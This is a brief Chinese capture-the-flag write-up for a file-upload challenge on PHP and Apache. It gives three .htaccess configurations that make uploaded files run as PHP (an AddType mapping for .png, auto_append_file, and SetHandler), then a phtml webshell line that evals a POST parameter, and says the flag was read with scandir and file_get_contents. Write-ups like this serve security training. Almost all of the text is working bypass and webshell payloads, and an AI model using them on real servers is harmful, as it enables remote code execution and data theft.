文件上传的题目,环境是php+apache
通过.htaccess绕过。
这里有几种方式:
# way1
AddType application/x-httpd-php .png
# way2
.htaccess
php_value auto_append_file .htaccess
#<?php phpinfo();
#way3
SetHandler application/x-httpd-php
然后上传phtml格式的木马:
<script language='php'>eval($_POST[mz]);</script>
查了一下phpinfo,没有ban很多函数。
直接scandir+file_get_contents带走。
over.